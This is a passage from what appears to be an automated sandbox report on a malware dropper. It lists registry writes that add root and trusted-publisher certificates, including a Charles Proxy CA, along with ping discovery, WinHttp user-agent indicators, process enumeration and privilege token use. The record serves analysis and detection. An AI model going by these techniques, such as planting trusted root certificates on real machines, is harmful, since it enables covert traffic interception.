Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 0f00000001000000200000002dc1a6a6cb0cb42f7e0d2c56f38bc7decbccd143405f669070ce130f9249ba48030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f	tapinstall.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	file.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD	Setup.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 0300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd2000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576	Setup.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be	vpn.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA	vpn.tmp
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0f00000001000000140000001b4e387db74a69a0470cb08f598beb3b511617530300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be	tapinstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	file.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC	vpn.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC	tapinstall.exe

Runs ping.exe 1 TTPs 5 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXEPING.EXEPING.EXEPING.EXE

pid process

7028 PING.EXE
3448 PING.EXE
3208 PING.EXE
2240 PING.EXE
3104 PING.EXE

pid	process
7028	PING.EXE
3448	PING.EXE
3208	PING.EXE
2240	PING.EXE
3104	PING.EXE

Script User-Agent 25 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	751	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	821	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1488	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1536	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1558	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1735	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	127	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	606	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	539	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	582	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	756	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1812	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	135	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	217	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	542	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	797	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	830	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1565	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1732	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	205	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	231	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1777	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1805	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	598	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1485	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

file.exeCC6E.tmp.exekey.exe1614953593757.exe1614953598241.exe1614953604538.exejfiag3g_gg.exe1371867.151214703.13multitimer.exe

pid	process
2468	file.exe
2468	file.exe
3704	CC6E.tmp.exe
3704	CC6E.tmp.exe
2468	file.exe
2468	file.exe
2468	file.exe
2468	file.exe
2468	file.exe
2468	file.exe
2220	key.exe
2220	key.exe
2044	1614953593757.exe
2044	1614953593757.exe
476	1614953598241.exe
476	1614953598241.exe
4352	1614953604538.exe
4352	1614953604538.exe
4392	jfiag3g_gg.exe
4392	jfiag3g_gg.exe
3900	1371867.15
3920	1214703.13
3920	1214703.13
4508	multitimer.exe
4508	multitimer.exe
4508	multitimer.exe
4508	multitimer.exe
4508	multitimer.exe
4508	multitimer.exe
4508	multitimer.exe
4508	multitimer.exe
4508	multitimer.exe
4508	multitimer.exe
4508	multitimer.exe
4508	multitimer.exe
4508	multitimer.exe
4508	multitimer.exe
4508	multitimer.exe
4508	multitimer.exe
4508	multitimer.exe
4508	multitimer.exe
4508	multitimer.exe
4508	multitimer.exe
4508	multitimer.exe
4508	multitimer.exe
4508	multitimer.exe
4508	multitimer.exe
4508	multitimer.exe
4508	multitimer.exe
4508	multitimer.exe
4508	multitimer.exe
4508	multitimer.exe
4508	multitimer.exe
4508	multitimer.exe
4508	multitimer.exe
4508	multitimer.exe
4508	multitimer.exe
4508	multitimer.exe
4508	multitimer.exe
4508	multitimer.exe
4508	multitimer.exe
4508	multitimer.exe
4508	multitimer.exe
4508	multitimer.exe

Suspicious behavior: LoadsDriver 2 IoCs

Processes:

pid process

616
616

pid	process
616
616

Suspicious behavior: MapViewOfSection 23 IoCs

Processes:

MicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exe

pid	process
5688	MicrosoftEdgeCP.exe
5756	MicrosoftEdgeCP.exe
5756	MicrosoftEdgeCP.exe
5756	MicrosoftEdgeCP.exe
5756	MicrosoftEdgeCP.exe
4624	MicrosoftEdgeCP.exe
4624	MicrosoftEdgeCP.exe
4624	MicrosoftEdgeCP.exe
4624	MicrosoftEdgeCP.exe
4624	MicrosoftEdgeCP.exe
4624	MicrosoftEdgeCP.exe
4624	MicrosoftEdgeCP.exe
4624	MicrosoftEdgeCP.exe
4624	MicrosoftEdgeCP.exe
4624	MicrosoftEdgeCP.exe
4624	MicrosoftEdgeCP.exe
4624	MicrosoftEdgeCP.exe
4624	MicrosoftEdgeCP.exe
4624	MicrosoftEdgeCP.exe
4624	MicrosoftEdgeCP.exe
4624	MicrosoftEdgeCP.exe
4624	MicrosoftEdgeCP.exe
4624	MicrosoftEdgeCP.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

file.exekey.exemsiexec.exemsiexec.exe

description	pid	process
Token: SeDebugPrivilege	2468	file.exe
Token: SeImpersonatePrivilege	2220	key.exe
Token: SeTcbPrivilege	2220	key.exe
Token: SeChangeNotifyPrivilege	2220	key.exe
Token: SeCreateTokenPrivilege	2220	key.exe
Token: SeBackupPrivilege	2220	key.exe
Token: SeRestorePrivilege	2220	key.exe
Token: SeIncreaseQuotaPrivilege	2220	key.exe
Token: SeAssignPrimaryTokenPrivilege	2220	key.exe
Token: SeImpersonatePrivilege	2220	key.exe
Token: SeTcbPrivilege	2220	key.exe
Token: SeChangeNotifyPrivilege	2220	key.exe
Token: SeCreateTokenPrivilege	2220	key.exe
Token: SeBackupPrivilege	2220	key.exe
Token: SeRestorePrivilege	2220	key.exe
Token: SeIncreaseQuotaPrivilege	2220	key.exe
Token: SeAssignPrimaryTokenPrivilege	2220	key.exe
Token: SeImpersonatePrivilege	2220	key.exe
Token: SeTcbPrivilege	2220	key.exe
Token: SeChangeNotifyPrivilege	2220	key.exe
Token: SeCreateTokenPrivilege	2220	key.exe
Token: SeBackupPrivilege	2220	key.exe
Token: SeRestorePrivilege	2220	key.exe
Token: SeIncreaseQuotaPrivilege	2220	key.exe
Token: SeAssignPrimaryTokenPrivilege	2220	key.exe
Token: SeImpersonatePrivilege	2220	key.exe
Token: SeTcbPrivilege	2220	key.exe
Token: SeChangeNotifyPrivilege	2220	key.exe
Token: SeCreateTokenPrivilege	2220	key.exe
Token: SeBackupPrivilege	2220	key.exe
Token: SeRestorePrivilege	2220	key.exe
Token: SeIncreaseQuotaPrivilege	2220	key.exe
Token: SeAssignPrimaryTokenPrivilege	2220	key.exe
Token: SeImpersonatePrivilege	2220	key.exe
Token: SeTcbPrivilege	2220	key.exe
Token: SeChangeNotifyPrivilege	2220	key.exe
Token: SeCreateTokenPrivilege	2220	key.exe
Token: SeBackupPrivilege	2220	key.exe
Token: SeRestorePrivilege	2220	key.exe
Token: SeIncreaseQuotaPrivilege	2220	key.exe
Token: SeAssignPrimaryTokenPrivilege	2220	key.exe
Token: SeShutdownPrivilege	1216	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1216	msiexec.exe
Token: SeSecurityPrivilege	2112	msiexec.exe
Token: SeCreateTokenPrivilege	1216	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	1216	msiexec.exe
Token: SeLockMemoryPrivilege	1216	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1216	msiexec.exe
Token: SeMachineAccountPrivilege	1216	msiexec.exe
Token: SeTcbPrivilege	1216	msiexec.exe
Token: SeSecurityPrivilege	1216	msiexec.exe
Token: SeTakeOwnershipPrivilege	1216	msiexec.exe
Token: SeLoadDriverPrivilege	1216	msiexec.exe
Token: SeSystemProfilePrivilege	1216	msiexec.exe
Token: SeSystemtimePrivilege	1216	msiexec.exe
Token: SeProfSingleProcessPrivilege	1216	msiexec.exe
Token: SeIncBasePriorityPrivilege	1216	msiexec.exe
Token: SeCreatePagefilePrivilege	1216	msiexec.exe
Token: SeCreatePermanentPrivilege	1216	msiexec.exe
Token: SeBackupPrivilege	1216	msiexec.exe
Token: SeRestorePrivilege	1216	msiexec.exe
Token: SeShutdownPrivilege	1216	msiexec.exe
Token: SeDebugPrivilege	1216	msiexec.exe
Token: SeAuditPrivilege	1216	msiexec.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

msiexec.exevict.tmpchashepro3.tmpSetup3310.tmpgx2ph5ctpwi.tmpvpn.tmpIBInstaller_97039.tmp

pid	process
1216	msiexec.exe
4724	vict.tmp
1920	chashepro3.tmp
4188	Setup3310.tmp
4936	gx2ph5ctpwi.tmp
4400	vpn.tmp
4384	IBInstaller_97039.tmp
4400	vpn.tmp
4400	vpn.tmp
4400	vpn.tmp
4400	vpn.tmp
4400	vpn.tmp
4400	vpn.tmp
4400	vpn.tmp
4400	vpn.tmp
4400	vpn.tmp
4400	vpn.tmp
4400	vpn.tmp
4400	vpn.tmp
4400	vpn.tmp
4400	vpn.tmp
4400	vpn.tmp
4400	vpn.tmp
4400	vpn.tmp
4400	vpn.tmp
4400	vpn.tmp
4400	vpn.tmp
4400	vpn.tmp
4400	vpn.tmp
4400	vpn.tmp
4400	vpn.tmp
4400	vpn.tmp
4400	vpn.tmp
4400	vpn.tmp
4400	vpn.tmp
4400	vpn.tmp
4400	vpn.tmp
4400	vpn.tmp
4400	vpn.tmp
4400	vpn.tmp
4400	vpn.tmp
4400	vpn.tmp
4400	vpn.tmp
4400	vpn.tmp
4400	vpn.tmp
4400	vpn.tmp
4400	vpn.tmp
4400	vpn.tmp
4400	vpn.tmp
4400	vpn.tmp
4400	vpn.tmp
4400	vpn.tmp
4400	vpn.tmp
4400	vpn.tmp
4400	vpn.tmp
4400	vpn.tmp
4400	vpn.tmp
4400	vpn.tmp
4400	vpn.tmp
4400	vpn.tmp
4400	vpn.tmp
4400	vpn.tmp
4400	vpn.tmp
4400	vpn.tmp

Suspicious use of SetWindowsHookEx 64 IoCs

Processes:

